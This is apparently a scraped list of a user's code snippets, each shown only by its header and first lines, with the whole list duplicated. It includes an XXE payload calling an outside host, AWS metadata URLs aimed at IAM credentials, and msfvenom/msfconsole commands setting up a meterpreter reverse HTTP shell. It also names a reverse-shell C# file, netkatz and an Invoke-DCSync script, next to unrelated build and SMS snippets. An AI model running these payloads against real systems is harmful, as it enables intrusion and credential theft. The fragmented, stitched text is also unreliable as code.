rkornmeyer

## XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

## cloud_metadata.txt
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories

http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

## Python-2.7.8-xcompile.patch
diff --git a/Makefile.pre.in b/Makefile.pre.in
index bcd83bf..efbfd8d 100644
--- a/Makefile.pre.in
+++ b/Makefile.pre.in
@@ -461,6 +461,7 @@ sharedmods: $(BUILDPYTHON) pybuilddir.txt
 	esac; \
 	$(RUNSHARED) CC='$(CC)' LDSHARED='$(BLDSHARED)' OPT='$(OPT)' \
 		_TCLTK_INCLUDES='$(TCLTK_INCLUDES)' _TCLTK_LIBS='$(TCLTK_LIBS)' \
+		PYTHONXCPREFIX='$(DESTDIR)$(prefix)' \
 		$(PYTHON_FOR_BUILD) $(srcdir)/setup.py $$quiet build

## netkatz.cs
using System;
using System.IO;
using System.Net;
using System.Text;
using System.IO.Compression;
using System.Collections.Generic;
using System.Configuration.Install;
using System.Runtime.InteropServices;


## Rulz.py
#!/usr/bin/env python
# Rulz.py
# Author: Nick Landers (@monoxgas) - Silent Break Security

import os
import sys
import argparse
import re
import binascii
import codecs

## Example.hta
<html>
	<!--
		Example By Casey Smith @subTee
		Generate Shellcode:
		msfvenom --payload windows/meterpreter/reverse_http LHOST=192.168.56.103 LPORT=8080 --format vba > msf.vba
		Wrap Shellcode in HTA
		Deliver
		Start Msf
			msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_http;set LPORT 8080;set LHOST 192.168.56.103;set ExitOnSession false; exploit -j"
		Wait for Shells to Rain

## pythonsms.py
# sms.py
# Sends sms message to any cell phone using gmail smtp gateway
# Written by Alex Le

import smtplib

# Use sms gateway provided by mobile carrier:
# at&t:     number@mms.att.net
# t-mobile: number@tmomail.net
# verizon:  number@vtext.com

## rev_http.cs
using System;
using System.Net;
using System.Configuration.Install;
using System.Runtime.InteropServices;

/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
Step One:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:revshell.exe rev_http.cs

## Invoke-DCSync.ps1
function Get-NetUser {
    <#
        .SYNOPSIS
        Query information for a given user or users in the domain.

        .DESCRIPTION
        This function users [ADSI] and LDAP to query the current
        domain for all users. Another domain can be specified to
        query for users across a trust.
        This is a replacement for "net users /domain"
	--------------------------------------------------------------
	Vanilla, used to verify outbound xxe or blind xxe
	--------------------------------------------------------------

	<?xml version="1.0" ?>
	<!DOCTYPE r [
	<!ELEMENT r ANY >
	<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
	]>
	<r>&sp;</r>
	## AWS
	# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories

	http://169.254.169.254/latest/user-data
	http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
	http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
	http://169.254.169.254/latest/meta-data/ami-id
	http://169.254.169.254/latest/meta-data/reservation-id
	http://169.254.169.254/latest/meta-data/hostname
	http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
	diff --git a/Makefile.pre.in b/Makefile.pre.in
	index bcd83bf..efbfd8d 100644
	--- a/Makefile.pre.in
	+++ b/Makefile.pre.in
	@@ -461,6 +461,7 @@ sharedmods: $(BUILDPYTHON) pybuilddir.txt
	esac; \
	$(RUNSHARED) CC='$(CC)' LDSHARED='$(BLDSHARED)' OPT='$(OPT)' \
	_TCLTK_INCLUDES='$(TCLTK_INCLUDES)' _TCLTK_LIBS='$(TCLTK_LIBS)' \
	+ PYTHONXCPREFIX='$(DESTDIR)$(prefix)' \
	$(PYTHON_FOR_BUILD) $(srcdir)/setup.py $$quiet build
	using System;
	using System.IO;
	using System.Net;
	using System.Text;
	using System.IO.Compression;
	using System.Collections.Generic;
	using System.Configuration.Install;
	using System.Runtime.InteropServices;
	#!/usr/bin/env python
	# Rulz.py
	# Author: Nick Landers (@monoxgas) - Silent Break Security

	import os
	import sys
	import argparse
	import re
	import binascii
	import codecs
	<html>
	<!--
	Example By Casey Smith @subTee
	Generate Shellcode:
	msfvenom --payload windows/meterpreter/reverse_http LHOST=192.168.56.103 LPORT=8080 --format vba > msf.vba
	Wrap Shellcode in HTA
	Deliver
	Start Msf
	msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_http;set LPORT 8080;set LHOST 192.168.56.103;set ExitOnSession false; exploit -j"
	Wait for Shells to Rain
	# sms.py
	# Sends sms message to any cell phone using gmail smtp gateway
	# Written by Alex Le

	import smtplib

	# Use sms gateway provided by mobile carrier:
	# at&t: number@mms.att.net
	# t-mobile: number@tmomail.net
	# verizon: number@vtext.com
	function Get-NetUser {
	<#
	.SYNOPSIS
	Query information for a given user or users in the domain.

	.DESCRIPTION
	This function users [ADSI] and LDAP to query the current
	domain for all users. Another domain can be specified to
	query for users across a trust.
	This is a replacement for "net users /domain"